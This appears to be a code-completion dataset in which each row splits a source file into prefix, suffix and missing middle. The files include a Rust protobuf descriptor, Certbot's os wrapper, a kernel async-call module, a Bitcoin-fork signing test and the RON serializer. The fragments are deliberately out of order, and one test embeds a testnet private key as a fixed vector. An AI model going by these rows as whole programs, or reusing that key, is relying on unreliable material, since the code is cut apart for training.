\x20the\x20insertion\x20point\x20comment\n\x20should\x20be\x20indented\
\x20the\x20same\x20amount\x20as\x20any\x20inserted\x20code\x20will\x20ne\
ed\x20to\x20be\n\x20in\x20order\x20to\x20work\x20correctly\x20in\x20that\
\x20context.\n\n\x20The\x20code\x20generator\x20that\x20generates\x20the\
\x20initial\x20file\x20and\x20the\x20one\x20which\n\x20inserts\x20into\
\x20it\x20must\x20both\x20run\x20as\x20part\x20of\x20a\x20single\x20invo\
cation\x20of\x20protoc.\n\x20Code\x20generators\x20are\x20executed\x20in\
\x20the\x20order\x20in\x20which\x20they\x20appear\x20on\x20the\n\x20comm\
and\x20line.\n\n\x20If\x20|insertion_point|\x20is\x20present,\x20|name|\
\x20must\x20also\x20be\x20present.\n\n\x0f\n\x07\x04\x02\x03\0\x02\x01\
\x04\x12\x04\xab\x01\x04\x0c\n\x0f\n\x07\x04\x02\x03\0\x02\x01\x05\x12\
\x04\xab\x01\r\x13\n\x0f\n\x07\x04\x02\x03\0\x02\x01\x01\x12\x04\xab\x01\
\x14#\n\x0f\n\x07\x04\x02\x03\0\x02\x01\x03\x12\x04\xab\x01&'\n$\n\x06\
\x04\x02\x03\0\x02\x02\x12\x04\xae\x01\x04!\x1a\x14\x20The\x20file\x20co\
ntents.\n\n\x0f\n\x07\x04\x02\x03\0\x02\x02\x04\x12\x04\xae\x01\x04\x0c\
\n\x0f\n\x07\x04\x02\x03\0\x02\x02\x05\x12\x04\xae\x01\r\x13\n\x0f\n\x07\
\x04\x02\x03\0\x02\x02\x01\x12\x04\xae\x01\x14\x1b\n\x0f\n\x07\x04\x02\
\x03\0\x02\x02\x03\x12\x04\xae\x01\x1e\x20\n\xe1\x01\n\x06\x04\x02\x03\0\
\x02\x03\x12\x04\xb3\x01\x048\x1a\xd0\x01\x20Information\x20describing\
\x20the\x20file\x20content\x20being\x20inserted.\x20If\x20an\x20insertio\
n\n\x20point\x20is\x20used,\x20this\x20information\x20will\x20be\x20appr\
opriately\x20offset\x20and\x20inserted\n\x20into\x20the\x20code\x20gener\
ation\x20metadata\x20for\x20the\x20generated\x20files.\n\n\x0f\n\x07\x04\
\x02\x03\0\x02\x03\x04\x12\x04\xb3\x01\x04\x0c\n\x0f\n\x07\x04\x02\x03\0\
\x02\x03\x06\x12\x04\xb3\x01\r\x1e\n\x0f\n\x07\x04\x02\x03\0\x02\x03\x01\
\x12\x04\xb3\x01\x1f2\n\x0f\n\x07\x04\x02\x03\0\x02\x03\x03\x12\x04\xb3\
\x0157\n\x0c\n\x04\x04\x02\x02\x02\x12\x04\xb5\x01\x02\x1a\n\r\n\x05\x04\
\x02\x02\x02\x04\x12\x04\xb5\x01\x02\n\n\r\n\x05\x04\x02\x02\x02\x06\x12\
\x04\xb5\x01\x0b\x0f\n\r\n\x05\x04\x02\x02\x02\x01\x12\x04\xb5\x01\x10\
\x14\n\r\n\x05\x04\x02\x02\x02\x03\x12\x04\xb5\x01\x17\x19\
";
/// `FileDescriptorProto` object which was a source for this generated file
pub fn file_descriptor_proto() -> &'static crate::descriptor::FileDescriptorProto {
static file_descriptor_proto_lazy: crate::rt::LazyV2<crate::descriptor::FileDescriptorProto> = crate::rt::LazyV2::INIT;
file_descriptor_proto_lazy.get(|| {
crate::Message::parse_from_bytes(file_descriptor_proto_data).unwrap()
})
}
/// `FileDescriptor` object which allows dynamic access to files
pub fn file_descriptor() -> crate::reflect::FileDescriptor {
static file_descriptor_lazy: crate::rt::LazyV2<crate::reflect::GeneratedFileDescriptor> = crate::rt::LazyV2::INIT;
let file_descriptor = file_descriptor_lazy.get(|| {
let mut deps = ::std::vec::Vec::new();
deps.push(crate::descriptor::file_descriptor());
let mut messages = ::std::vec::Vec::new();
messages.push(Version::generated_message_descriptor_data());
messages.push(CodeGeneratorRequest::generated_message_descriptor_data());
messages.push(CodeGeneratorResponse::generated_message_descriptor_data());
messages.push(code_generator_response::File::generated_message_descriptor_data());
let mut enums = ::std::vec::Vec::new();
enums.push(code_generator_response::Feature::generated_enum_descriptor_data());
crate::reflect::GeneratedFileDescriptor::new_generated(
file_descriptor_proto(),
deps,
messages,
enums,
)
});
crate::reflect::FileDescriptor::new_generated_2(file_descriptor)
} | be\x20relative,\x20not\x20be\x20absolute\x20(so,\n\x20the\x20file\x20can\
not\x20lie\x20outside\x20the\x20output\x20directory).\x20\x20\"/\"\x20mu\
st\x20be\x20used\x20as\n\x20the\x20path\x20separator,\x20not\x20\"\\\".\ |
edit_css.js | // var nub =document.getElementsByClassName("dropdown-item edit_img").length;
// console.log(nub);
// console.log(img_edit_btn);
// for(var i=0 ;i < nub;i++)
// {
// img_edit_btn.setAttribute("data_imgedit_id",i);
// }
// Apply the width/height values from the edit form to the image being edited.
// (`img_x` is assumed to be set elsewhere to the currently selected <img>.)
function edit_css(){
    var form_w = document.getElementById("css_edit_width");
    var form_h = document.getElementById("css_edit_height");
    img_x.style.width = form_w.value;
    img_x.style.height = form_h.value;
}
function updata_h1(){ |
} | var form_h1_value = document.getElementById("css_edit_h1"); |
os.py | """
This compat module is a wrapper around the core os module that forbids usage of specific operations
(e.g. chown, chmod, getuid) that would be harmful to the Windows file security model of Certbot.
This module is intended to replace the standard os module throughout certbot projects (except acme).
"""
# pylint: disable=function-redefined
from __future__ import absolute_import
# First round of wrapping: we statically import all public attributes exposed by the os module.
# This allows in particular pylint, mypy, and IDEs to be aware that most os members are
# available in certbot.compat.os.
from os import * # type: ignore # pylint: disable=wildcard-import,unused-wildcard-import,redefined-builtin,os-module-forbidden
# Second round of wrapping: we dynamically import all attributes from the os module that have
# not yet been imported by the first round (static import). This covers in particular the case
# of specific Python 3.x versions where not all public attributes are in the special __all__
# of os, and so are not imported by `from os import *`.
import os as std_os # pylint: disable=os-module-forbidden
import sys as std_sys
ourselves = std_sys.modules[__name__]
for attribute in dir(std_os):
    # Check if the attribute does not already exist in our module. These could be internal
    # attributes of the module (__name__, __doc__), or attributes from the standard os module
    # already imported with `from os import *`.
if not hasattr(ourselves, attribute):
|
# Similar to os.path, allow certbot.compat.os.path to behave as a module
std_sys.modules[__name__ + '.path'] = path
# Clean all remaining importables that are not from the core os module.
del ourselves, std_os, std_sys
# Chmod is the root of all evil for our security model on Windows. With the default implementation
# of os.chmod on Windows, almost all bits of the mode are ignored, and only a general RO or RW is
# applied. The DACL, the underlying mechanism that controls file access on Windows, stays on its
# default definition, effectively giving at least read permissions to anyone, since the default
# permissions on the root path are inherited by the file (as NTFS specifies), and the root path
# can be read by anyone. So the given mode needs to be translated into a secured, non-inherited
# DACL that is applied to the file using filesystem.chmod, which internally calls the
# win32security module to construct and apply the DACL. The complete security model used to
# translate a POSIX mode into a suitable DACL on Windows for Certbot can be found here:
# https://github.com/certbot/certbot/issues/6356
# Basically, it states that appropriate permissions will be set for the owner, nothing for the
# group, appropriate permissions for the "Everyone" group, and all permissions for the
# "Administrators" group + "System" user, as they can do everything anyway.
def chmod(*unused_args, **unused_kwargs): # pylint: disable=function-redefined
"""Method os.chmod() is forbidden"""
raise RuntimeError('Usage of os.chmod() is forbidden. '
'Use certbot.compat.filesystem.chmod() instead.')
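# Illustrative replacement (a sketch, not part of this module): callers are expected to go
# through certbot.compat.filesystem instead, which builds and applies a DACL on Windows:
#
#   from certbot.compat import filesystem
#   filesystem.chmod(path, 0o700)  # secure DACL on Windows, regular chmod on POSIX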
# Because of the blocking strategy on file handles on Windows, rename does not behave as it does
# on POSIX systems: an exception will be raised if dst already exists.
def rename(*unused_args, **unused_kwargs):
"""Method os.rename() is forbidden"""
raise RuntimeError('Usage of os.rename() is forbidden. '
'Use certbot.compat.filesystem.replace() instead.')
# The behavior of os.replace is consistent between Windows and Linux. However, it is not supported
# on Python 2.x. So, as with os.rename, we forbid it in favor of filesystem.replace.
def replace(*unused_args, **unused_kwargs):
"""Method os.replace() is forbidden"""
raise RuntimeError('Usage of os.replace() is forbidden. '
'Use certbot.compat.filesystem.replace() instead.')
| setattr(ourselves, attribute, getattr(std_os, attribute)) |
PriceLadderDescription.ts | /**
* Copyright 2020 Colin Doig. Distributed under the MIT license.
*/
import JsonMember from '../JsonMember';
import PriceLadderType from '../sport/enum/PriceLadderType';
export interface IPriceLadderDescriptionOptions {
type: PriceLadderType | string;
}
export default class PriceLadderDescription extends JsonMember { |
constructor(options: IPriceLadderDescriptionOptions) {
super();
this.type = this.fromJson(options.type, PriceLadderType);
}
public toJson(): IPriceLadderDescriptionOptions {
const json: IPriceLadderDescriptionOptions = {
type: this.type.getValue(),
};
return json;
}
public getType(): PriceLadderType {
return this.type;
}
public setType(type: PriceLadderType): void {
this.type = type;
}
} | private type: PriceLadderType; |
mod.rs | mod fs;
mod structs;
use alloc::{boxed::Box, sync::Arc};
use core::convert::TryFrom;
use core::{
future::Future,
pin::Pin,
task::{Context, Poll},
};
use spin::Mutex;
use crate::arch::cpu;
use crate::config::IO_CPU_ID;
use crate::error::{AcoreError, AcoreResult};
use crate::memory::{
addr::{is_aligned, virt_to_phys},
areas::{PmAreaFixed, VmArea},
MMUFlags, PAGE_SIZE,
};
use crate::sched::yield_now;
use crate::task::{PerCpu, Thread};
use structs::{AsyncCallType, CompletionRingEntry, RequestRingEntry};
pub use structs::{AsyncCallBuffer, AsyncCallInfoUser};
pub struct AsyncCall {
thread: Arc<Thread>,
}
type AsyncCallResult = AcoreResult<usize>;
impl AsyncCall {
pub fn new(thread: Arc<Thread>) -> Self {
Self { thread }
}
pub fn setup(
thread: &Arc<Thread>,
req_capacity: usize,
comp_capacity: usize,
) -> AcoreResult<AsyncCallInfoUser> {
// create shared memory
if thread.owned_res.async_buf.lock().is_some() {
return Err(AcoreError::AlreadyExists);
}
let buf = AsyncCallBuffer::new(req_capacity, comp_capacity)?;
let buf_size = buf.size();
let start_paddr = virt_to_phys(buf.as_ptr::<u8>() as usize);
let end_paddr = start_paddr + buf_size;
debug_assert!(is_aligned(start_paddr));
// push to user's MemorySet
let mut vm = thread.vm.lock();
let pma = PmAreaFixed::new(start_paddr, end_paddr)?;
let user_buf_ptr = vm.find_free_area(PAGE_SIZE, buf_size)?;
let vma = VmArea::new(
user_buf_ptr,
user_buf_ptr + buf_size,
MMUFlags::READ | MMUFlags::WRITE | MMUFlags::USER,
Arc::new(Mutex::new(pma)),
"async_call_buffer",
)?;
vm.push(vma)?;
let info = buf.fill_user_info(user_buf_ptr);
*thread.owned_res.async_buf.lock() = Some(buf);
// spawn async call polling coroutine and notify the I/O CPU
spawn_polling(thread);
Ok(info)
}
async fn do_async_call(&self, req: &RequestRingEntry) -> AsyncCallResult {
if self.thread.is_exited() {
return Err(AcoreError::BadState);
}
let ac_type = match AsyncCallType::try_from(req.opcode) {
Ok(t) => t,
Err(_) => {
error!("invalid async call number: {}", req.opcode);
return Err(AcoreError::InvalidArgs);
}
};
debug!("AsyncCall: {:?} => {:x?}", ac_type, req);
let fd = req.fd as usize;
let flags = req.flags as usize;
let offset = req.offset as usize;
let user_buf_addr = req.user_buf_addr as usize;
let buf_size = req.buf_size as usize;
let ret = match ac_type {
AsyncCallType::Nop => Ok(0),
AsyncCallType::Read => {
self.async_read(fd, user_buf_addr.into(), buf_size, offset)
.await
}
AsyncCallType::Write => {
self.async_write(fd, user_buf_addr.into(), buf_size, offset)
.await
}
AsyncCallType::Open => self.async_open(user_buf_addr.into(), flags).await,
AsyncCallType::Close => self.async_close(fd).await,
_ => {
warn!("asynca call unimplemented: {:?}", ac_type);
Err(AcoreError::NotSupported)
}
};
if ret.is_err() {
warn!("AsyncCall: {:?} <= {:?}", ac_type, ret);
} else {
info!("AsyncCall: {:?} <= {:?}", ac_type, ret);
}
ret
}
async fn polling_once(&self) -> AcoreResult {
let buf_lock = self.thread.owned_res.async_buf.lock();
let buf = match buf_lock.as_ref() {
Some(b) => b,
None => return Err(AcoreError::BadState),
};
debug!("thread {}: {:#x?}", self.thread.id, buf.as_raw());
let mut cached_req_head = buf.read_req_ring_head();
let mut cached_comp_tail = buf.read_comp_ring_tail();
let req_count = buf.request_count(cached_req_head)?;
// TODO: limit requests count or time for one thread
for _ in 0..req_count {
if self.thread.is_exited() {
break;
}
let req_entry = buf.req_entry_at(cached_req_head);
let res = self.do_async_call(&req_entry).await;
while buf.completion_count(cached_comp_tail)? == buf.comp_capacity {
yield_now().await;
}
*buf.comp_entry_at(cached_comp_tail) =
CompletionRingEntry::new(req_entry.user_data, res);
cached_comp_tail += 1;
buf.write_comp_ring_tail(cached_comp_tail);
cached_req_head += 1;
}
buf.write_req_ring_head(cached_req_head);
Ok(())
}
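    // User-space counterpart (an illustrative sketch; none of this is defined
    // in this file): the application writes `RequestRingEntry`s behind the
    // request tail it owns and bumps that tail, then reaps
    // `CompletionRingEntry`s up to the completion tail published by
    // `polling_once` above. Each side only ever advances the index it owns,
    // the same split-ring handshake that io_uring uses.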
async fn polling(&self) {
info!("start async call polling for thread {}...", self.thread.id);
while !self.thread.is_exited() {
let res = self.polling_once().await;
if let Err(e) = res {
self.thread.exit(e as usize);
break;
}
yield_now().await;
}
info!("async call polling for thread {} is done.", self.thread.id);
}
}
type AsyncCallFuture = dyn Future<Output = ()> + Send;
type AsyncCallFuturePinned = Pin<Box<AsyncCallFuture>>;
struct AsyncCallSwitchFuture {
thread: Arc<Thread>,
future: AsyncCallFuturePinned,
}
impl AsyncCallSwitchFuture {
fn new(thread: Arc<Thread>, future: AsyncCallFuturePinned) -> Self {
Self { thread, future }
}
}
impl Future for AsyncCallSwitchFuture {
type Output = ();
fn poll(self: Pin<&mut Self>, cx: &mut Context<'_>) -> Poll<Self::Output> {
PerCpu::set_current_thread(&self.thread);
self.get_mut().future.as_mut().poll(cx)
}
}
fn spawn_polling(thread: &Arc<Thread>) |
pub fn init() {
info!("async call init end.");
}
pub fn run_forever() -> ! {
loop {
PerCpu::from_cpu_id(IO_CPU_ID).run_until_idle();
info!("no async coroutines to run, waiting for interrupt...");
cpu::wait_for_interrupt();
}
}
| {
let ac = AsyncCall::new(thread.clone());
PerCpu::from_cpu_id(IO_CPU_ID).spawn(AsyncCallSwitchFuture::new(
thread.clone(),
Box::pin(async move { ac.polling().await }),
));
cpu::send_ipi(IO_CPU_ID);
} |
wdecimal.rs | use crate::context::ContextProvider;
use crate::model::row::Row;
use crate::type_writer::TypeBodyWriter;
use crate::types::common::Common;
use liquesco_common::error::LqError;
use liquesco_schema::types::decimal::TDecimal;
use std::marker::PhantomData;
pub struct WDecimal<'a> {
_phantom: &'a PhantomData<()>,
}
impl<'a> TypeBodyWriter for WDecimal<'a> {
type T = TDecimal<'a>;
fn write<'b, TContext>(_: &TContext, typ: &Self::T) -> Result<Vec<Row<'static>>, LqError>
where
TContext: ContextProvider<'b>,
{
let range = typ.range();
Ok(vec![
Row::association_with_text(
format!("Minimum ({})", included(range.start_included())),
Common::fmt_decimal(range.start()),
),
Row::association_with_text(
format!("Maximum ({})", included(range.end_included())),
Common::fmt_decimal(range.end()),
),
])
}
}
fn included(included: bool) -> &'static str | {
if included {
"inclusive"
} else {
"exclusive"
}
} |
|
signmessages.py | #!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Copyright (c) 2017 The Whiff Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test RPC commands for signing and verifying messages."""
from test_framework.test_framework import WhiffTestFramework
from test_framework.util import assert_equal
class SignMessagesTest(WhiffTestFramework):
def set_test_params(self):
|
def run_test(self):
message = 'This is just a test message'
self.log.info('test signing with priv_key')
priv_key = 'cUeKHd5orzT3mz8P9pxyREHfsWtVfgsfDjiZZBcjUBAaGk1BTj7N'
address = 'mpLQjfK79b7CCV4VMJWEWAj5Mpx8Up5zxB'
expected_signature = 'H5vCbG+WhOeOPJ3jf6oux/1oSjkuIGZigCw4NW+A0/fSDlgdO4fMq0SWSfx7gUMB9kuG+t/0BQxtXaTCr7v9fGM='
signature = self.nodes[0].signmessagewithprivkey(priv_key, message)
assert_equal(expected_signature, signature)
assert(self.nodes[0].verifymessage(address, signature, message))
self.log.info('test signing with an address with wallet')
address = self.nodes[0].getnewaddress()
signature = self.nodes[0].signmessage(address, message)
assert(self.nodes[0].verifymessage(address, signature, message))
self.log.info('test verifying with another address should not work')
other_address = self.nodes[0].getnewaddress()
other_signature = self.nodes[0].signmessage(other_address, message)
assert(not self.nodes[0].verifymessage(other_address, signature, message))
assert(not self.nodes[0].verifymessage(address, other_signature, message))
if __name__ == '__main__':
SignMessagesTest().main()
| self.setup_clean_chain = True
self.num_nodes = 1 |
wsgi.py | """
WSGI config for billsengine_31836 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see |
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'billsengine_31836.settings')
application = get_wsgi_application() | https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
""" |
mod.rs | use serde::{ser, Deserialize, Serialize};
use std::io;
use crate::{
error::{Error, Result},
extensions::Extensions,
options::Options,
parse::{is_ident_first_char, is_ident_other_char, LargeSInt, LargeUInt},
};
#[cfg(test)]
mod tests;
mod value;
/// Serializes `value` into `writer`
pub fn to_writer<W, T>(writer: W, value: &T) -> Result<()>
where
W: io::Write,
T: ?Sized + Serialize,
{
Options::default().to_writer(writer, value)
}
/// Serializes `value` into `writer` in a pretty way.
pub fn to_writer_pretty<W, T>(writer: W, value: &T, config: PrettyConfig) -> Result<()>
where
W: io::Write,
T: ?Sized + Serialize,
{
Options::default().to_writer_pretty(writer, value, config)
}
/// Serializes `value` and returns it as string.
///
/// This function does not generate any newlines or nice formatting;
/// if you want that, you can use `to_string_pretty` instead.
pub fn to_string<T>(value: &T) -> Result<String>
where
T: ?Sized + Serialize,
{
Options::default().to_string(value)
}
/// Serializes `value` in the recommended RON layout in a pretty way.
pub fn to_string_pretty<T>(value: &T, config: PrettyConfig) -> Result<String>
where
T: ?Sized + Serialize,
{
Options::default().to_string_pretty(value, config)
}
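// A minimal usage sketch added for illustration (not part of the original
// module); it relies only on the public helpers defined above.
#[cfg(test)]
mod usage_sketch {
    use super::{to_string, to_string_pretty, PrettyConfig};

    #[test]
    fn compact_vs_pretty() {
        // Without a `PrettyConfig`, output is compact: no separators at all.
        assert_eq!(to_string(&(1, true)).unwrap(), "(1,true)");
        // With the default pretty config, the one-space `separator` is written
        // after commas; the tuple stays on one line because
        // `separate_tuple_members` defaults to `false`.
        let pretty = to_string_pretty(&(1, true), PrettyConfig::new()).unwrap();
        assert_eq!(pretty, "(1, true)");
    }
}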
/// Pretty serializer state
struct Pretty {
indent: usize,
sequence_index: Vec<usize>,
}
/// Pretty serializer configuration.
///
/// # Examples
///
/// ```
/// use ron::ser::PrettyConfig;
///
/// let my_config = PrettyConfig::new()
/// .depth_limit(4)
/// // definitely superior (okay, just joking)
/// .indentor("\t".to_owned());
/// ```
#[derive(Clone, Debug, Serialize, Deserialize)]
#[serde(default)]
#[non_exhaustive]
pub struct PrettyConfig {
/// Limit the pretty-ness up to the given depth.
pub depth_limit: usize,
/// New line string
pub new_line: String,
/// Indentation string
pub indentor: String,
/// Separator string
pub separator: String,
    /// Whether to emit struct names
pub struct_names: bool,
/// Separate tuple members with indentation
pub separate_tuple_members: bool,
/// Enumerate array items in comments
pub enumerate_arrays: bool,
/// Enable extensions. Only configures 'implicit_some',
/// 'unwrap_newtypes', and 'unwrap_variant_newtypes' for now.
pub extensions: Extensions,
/// Enable compact arrays
pub compact_arrays: bool,
}
impl PrettyConfig {
/// Creates a default `PrettyConfig`.
pub fn new() -> Self {
Default::default()
}
/// Limits the pretty-formatting based on the number of indentations.
/// I.e., with a depth limit of 5, starting with an element of depth
/// (indentation level) 6, everything will be put into the same line,
/// without pretty formatting.
///
/// Default: [std::usize::MAX]
pub fn depth_limit(mut self, depth_limit: usize) -> Self {
self.depth_limit = depth_limit;
self
}
/// Configures the newlines used for serialization.
///
/// Default: `\r\n` on Windows, `\n` otherwise
pub fn new_line(mut self, new_line: String) -> Self {
self.new_line = new_line;
self
}
/// Configures the string sequence used for indentation.
///
/// Default: 4 spaces
pub fn indentor(mut self, indentor: String) -> Self {
self.indentor = indentor;
self
}
/// Configures the string sequence used to separate items inline.
///
/// Default: 1 space
pub fn separator(mut self, separator: String) -> Self {
self.separator = separator;
self
}
/// Configures whether to emit struct names.
///
/// Default: `false`
pub fn struct_names(mut self, struct_names: bool) -> Self {
self.struct_names = struct_names;
self
}
/// Configures whether tuples are single- or multi-line.
/// If set to `true`, tuples will have their fields indented and in new
/// lines. If set to `false`, tuples will be serialized without any
/// newlines or indentations.
///
/// Default: `false`
pub fn separate_tuple_members(mut self, separate_tuple_members: bool) -> Self {
self.separate_tuple_members = separate_tuple_members;
self
}
/// Configures whether a comment shall be added to every array element,
/// indicating the index.
///
/// Default: `false`
pub fn enumerate_arrays(mut self, enumerate_arrays: bool) -> Self {
self.enumerate_arrays = enumerate_arrays;
self
}
    /// Configures whether every array should be a single line (`true`) or multi-line (`false`).
    ///
    /// When `false`, `["a","b"]` (as well as any array) will serialize to
    /// `
    /// [
    ///     "a",
    ///     "b",
    /// ]
    /// `
    /// When `true`, `["a","b"]` (as well as any array) will serialize to `["a","b"]`.
///
/// Default: `false`
pub fn compact_arrays(mut self, compact_arrays: bool) -> Self {
self.compact_arrays = compact_arrays;
self
}
/// Configures extensions
///
/// Default: Extensions::empty()
pub fn extensions(mut self, extensions: Extensions) -> Self {
self.extensions = extensions;
self
}
}
impl Default for PrettyConfig {
fn default() -> Self {
PrettyConfig {
depth_limit: !0,
new_line: if cfg!(not(target_os = "windows")) {
String::from("\n")
} else {
String::from("\r\n")
},
indentor: String::from(" "),
separator: String::from(" "),
struct_names: false,
separate_tuple_members: false,
enumerate_arrays: false,
extensions: Extensions::empty(),
compact_arrays: false,
}
}
}
/// The RON serializer.
///
/// You can just use `to_string` for serializing a value.
/// If you want it pretty-printed, take a look at `to_string_pretty`.
pub struct Serializer<W: io::Write> {
output: W,
pretty: Option<(PrettyConfig, Pretty)>,
default_extensions: Extensions,
is_empty: Option<bool>,
newtype_variant: bool,
}
impl<W: io::Write> Serializer<W> {
/// Creates a new `Serializer`.
///
/// Most of the time you can just use `to_string` or `to_string_pretty`.
pub fn new(writer: W, config: Option<PrettyConfig>) -> Result<Self> {
Self::with_options(writer, config, Options::default())
}
/// Creates a new `Serializer`.
///
/// Most of the time you can just use `to_string` or `to_string_pretty`.
pub fn with_options(
mut writer: W,
config: Option<PrettyConfig>,
options: Options,
) -> Result<Self> {
if let Some(conf) = &config {
let non_default_extensions = !options.default_extensions;
if (non_default_extensions & conf.extensions).contains(Extensions::IMPLICIT_SOME) {
writer.write_all(b"#![enable(implicit_some)]")?;
writer.write_all(conf.new_line.as_bytes())?;
};
if (non_default_extensions & conf.extensions).contains(Extensions::UNWRAP_NEWTYPES) {
writer.write_all(b"#![enable(unwrap_newtypes)]")?;
writer.write_all(conf.new_line.as_bytes())?;
};
if (non_default_extensions & conf.extensions)
.contains(Extensions::UNWRAP_VARIANT_NEWTYPES)
{
writer.write_all(b"#![enable(unwrap_variant_newtypes)]")?;
writer.write_all(conf.new_line.as_bytes())?;
};
};
Ok(Serializer {
output: writer,
pretty: config.map(|conf| {
(
conf,
Pretty {
indent: 0,
sequence_index: Vec::new(),
},
)
}),
default_extensions: options.default_extensions,
is_empty: None,
newtype_variant: false,
})
}
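    // For illustration (an assumed configuration, not original code): building
    // a serializer with `PrettyConfig::new().extensions(Extensions::IMPLICIT_SOME)`
    // makes `with_options` above emit the `#![enable(implicit_some)]` header,
    // followed by the configured newline, before any value is serialized.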
fn separate_tuple_members(&self) -> bool {
self.pretty
.as_ref()
.map_or(false, |&(ref config, _)| config.separate_tuple_members)
}
fn compact_arrays(&self) -> bool {
self.pretty
.as_ref()
.map_or(false, |&(ref config, _)| config.compact_arrays)
}
fn extensions(&self) -> Extensions {
self.default_extensions
| self
.pretty
.as_ref()
.map_or(Extensions::empty(), |&(ref config, _)| config.extensions)
}
fn start_indent(&mut self) -> Result<()> {
if let Some((ref config, ref mut pretty)) = self.pretty {
pretty.indent += 1;
if pretty.indent <= config.depth_limit {
let is_empty = self.is_empty.unwrap_or(false);
if !is_empty {
self.output.write_all(config.new_line.as_bytes())?;
}
}
}
Ok(())
}
fn indent(&mut self) -> io::Result<()> {
if let Some((ref config, ref pretty)) = self.pretty {
if pretty.indent <= config.depth_limit {
for _ in 0..pretty.indent {
self.output.write_all(config.indentor.as_bytes())?;
}
}
}
Ok(())
}
fn end_indent(&mut self) -> io::Result<()> {
if let Some((ref config, ref mut pretty)) = self.pretty {
if pretty.indent <= config.depth_limit {
let is_empty = self.is_empty.unwrap_or(false);
if !is_empty {
for _ in 1..pretty.indent {
self.output.write_all(config.indentor.as_bytes())?;
}
}
}
pretty.indent -= 1;
self.is_empty = None;
}
Ok(())
}
fn serialize_escaped_str(&mut self, value: &str) -> io::Result<()> {
self.output.write_all(b"\"")?;
let mut scalar = [0u8; 4];
for c in value.chars().flat_map(|c| c.escape_debug()) {
self.output
.write_all(c.encode_utf8(&mut scalar).as_bytes())?;
}
self.output.write_all(b"\"")?;
Ok(())
}
fn serialize_sint(&mut self, value: impl Into<LargeSInt>) -> Result<()> {
// TODO optimize
write!(self.output, "{}", value.into())?;
Ok(())
}
fn serialize_uint(&mut self, value: impl Into<LargeUInt>) -> Result<()> {
// TODO optimize
write!(self.output, "{}", value.into())?;
Ok(())
}
fn write_identifier(&mut self, name: &str) -> io::Result<()> {
let mut bytes = name.as_bytes().iter().cloned();
if !bytes.next().map_or(false, is_ident_first_char) || !bytes.all(is_ident_other_char) {
self.output.write_all(b"r#")?;
}
self.output.write_all(name.as_bytes())?;
Ok(())
}
fn struct_names(&self) -> bool {
self.pretty
.as_ref()
.map(|(pc, _)| pc.struct_names)
.unwrap_or(false)
}
}
impl<'a, W: io::Write> ser::Serializer for &'a mut Serializer<W> {
type Error = Error;
type Ok = ();
type SerializeMap = Compound<'a, W>;
type SerializeSeq = Compound<'a, W>;
type SerializeStruct = Compound<'a, W>;
type SerializeStructVariant = Compound<'a, W>;
type SerializeTuple = Compound<'a, W>;
type SerializeTupleStruct = Compound<'a, W>;
type SerializeTupleVariant = Compound<'a, W>;
fn serialize_bool(self, v: bool) -> Result<()> {
self.output.write_all(if v { b"true" } else { b"false" })?;
Ok(())
}
fn serialize_i8(self, v: i8) -> Result<()> |
fn serialize_i16(self, v: i16) -> Result<()> {
self.serialize_sint(v)
}
fn serialize_i32(self, v: i32) -> Result<()> {
self.serialize_sint(v)
}
fn serialize_i64(self, v: i64) -> Result<()> {
self.serialize_sint(v)
}
#[cfg(feature = "integer128")]
fn serialize_i128(self, v: i128) -> Result<()> {
self.serialize_sint(v)
}
fn serialize_u8(self, v: u8) -> Result<()> {
self.serialize_uint(v)
}
fn serialize_u16(self, v: u16) -> Result<()> {
self.serialize_uint(v)
}
fn serialize_u32(self, v: u32) -> Result<()> {
self.serialize_uint(v)
}
fn serialize_u64(self, v: u64) -> Result<()> {
self.serialize_uint(v)
}
#[cfg(feature = "integer128")]
fn serialize_u128(self, v: u128) -> Result<()> {
self.serialize_uint(v)
}
fn serialize_f32(self, v: f32) -> Result<()> {
write!(self.output, "{}", v)?;
if v.fract() == 0.0 {
write!(self.output, ".0")?;
}
Ok(())
}
fn serialize_f64(self, v: f64) -> Result<()> {
write!(self.output, "{}", v)?;
if v.fract() == 0.0 {
write!(self.output, ".0")?;
}
Ok(())
}
fn serialize_char(self, v: char) -> Result<()> {
self.output.write_all(b"'")?;
if v == '\\' || v == '\'' {
self.output.write_all(b"\\")?;
}
write!(self.output, "{}", v)?;
self.output.write_all(b"'")?;
Ok(())
}
fn serialize_str(self, v: &str) -> Result<()> {
self.serialize_escaped_str(v)?;
Ok(())
}
fn serialize_bytes(self, v: &[u8]) -> Result<()> {
self.serialize_str(base64::encode(v).as_str())
}
fn serialize_none(self) -> Result<()> {
self.output.write_all(b"None")?;
Ok(())
}
fn serialize_some<T>(self, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
let implicit_some = self.extensions().contains(Extensions::IMPLICIT_SOME);
if !implicit_some {
self.output.write_all(b"Some(")?;
}
value.serialize(&mut *self)?;
if !implicit_some {
self.output.write_all(b")")?;
}
Ok(())
}
fn serialize_unit(self) -> Result<()> {
if !self.newtype_variant {
self.output.write_all(b"()")?;
}
self.newtype_variant = false;
Ok(())
}
fn serialize_unit_struct(self, name: &'static str) -> Result<()> {
if self.struct_names() && !self.newtype_variant {
self.write_identifier(name)?;
Ok(())
} else {
self.serialize_unit()
}
}
fn serialize_unit_variant(self, _: &'static str, _: u32, variant: &'static str) -> Result<()> {
self.write_identifier(variant)?;
Ok(())
}
fn serialize_newtype_struct<T>(self, name: &'static str, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
if self.extensions().contains(Extensions::UNWRAP_NEWTYPES) || self.newtype_variant {
self.newtype_variant = false;
return value.serialize(&mut *self);
}
if self.struct_names() {
self.write_identifier(name)?;
}
self.output.write_all(b"(")?;
value.serialize(&mut *self)?;
self.output.write_all(b")")?;
Ok(())
}
fn serialize_newtype_variant<T>(
self,
_: &'static str,
_: u32,
variant: &'static str,
value: &T,
) -> Result<()>
where
T: ?Sized + Serialize,
{
self.write_identifier(variant)?;
self.output.write_all(b"(")?;
self.newtype_variant = self
.extensions()
.contains(Extensions::UNWRAP_VARIANT_NEWTYPES);
value.serialize(&mut *self)?;
self.newtype_variant = false;
self.output.write_all(b")")?;
Ok(())
}
fn serialize_seq(self, len: Option<usize>) -> Result<Self::SerializeSeq> {
self.newtype_variant = false;
self.output.write_all(b"[")?;
if let Some(len) = len {
self.is_empty = Some(len == 0);
}
if !self.compact_arrays() {
